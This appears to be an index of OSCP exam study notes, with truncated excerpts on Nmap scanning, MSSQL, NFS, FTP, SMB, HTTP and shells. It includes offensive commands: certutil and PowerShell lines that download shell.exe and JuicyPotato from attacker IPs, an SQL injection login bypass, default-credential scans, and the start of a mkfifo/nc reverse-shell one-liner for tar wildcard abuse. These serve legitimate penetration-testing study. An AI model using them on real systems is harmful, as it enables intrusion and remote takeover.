MSSQL OSCP

MSSQL Services
mssql-vulnerability - Nmap can be leveraged to scan MSSQL for known vulnerabilities.
Example syntax:
nmap -vv -sV -Pn -p [PORT] --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=[PORT],mssql.username=sa,mssql.password=sa [IP]
mssql-default -…


NFS OSCP

NMAP Script
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
nmap -p 111 --script 'nfs*' 10.11.1.72
Mount NFS
mkdir john
sudo mount -o nolock 10.1.1.72:/home/john john
showmount to show NFS shares
showmount…


OSCP links

IPPSEC Website https://ippsec.rocks/
Reverse Shell Cheat Sheet http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Windows PrivEsc https://www.fuzzysecurity.com/tutorials/16.html
Linux PrivEsc https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Payloads https://github.com/swisskyrepo/PayloadsAllTheThings
OSCP Notes Link https://www.notion.so/OSCP-Exam-Notes-EXAM_DATE-cb9d15436e4849339aaa35979d582735
Useful OSCP Commands https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02
IPEWorkshop https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02
OSCP Cheat Sheet https://github.com/avi7611/Oscp-Cheat-Sheet/tree/master/oscp


NMAP

Scan all ports and output to file
nmap -p- -sC -sV -o nmap.out <IP Address>
TCP scan all ports
sudo nmap -sC -sS -p0-65535 <IP…


Download Files Windows

Download files with certutil
certutil.exe -urlcache -f http://10.9.218.104/shell.exe shell.exe
Using PowerShell to download files to Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.35/JuicyPotato.exe','C:\temp\JuicyPotato.exe')"
Also a great resource: https://lolbas-project.github.io/


FTP OSCP

# NMAP
sudo nmap --script=ftp-anon -p 21 <IP Address>
nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 192.168.1.1
# Start FTP using python
sudo python -m pyftpdlib -p 21
Creating txt…


HTTP OSCP

Simple SQL injection to try on a login form
admin:' OR '1'='1
Using Nmap to scan for HTTP exploits
sudo nmap --script='http-vul*' -p 80 <IP Address>
nmap -Pn -sV -sC -vvvvv…


SMB OSCP

Use Nmap to scan a host for SMB exploits
sudo nmap --script='smb-vul*' <IP Address>
sudo nmap --script='smb-enum*' <IP Address>
nmap -v -p 139,445 --script=smb-os-discovery 10.11.1.227
SMB version, Windows version, CIFS…


Shells

The following are notes from my pentesting course for OSCP.
If there is an app using tar * you can do the following:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc…
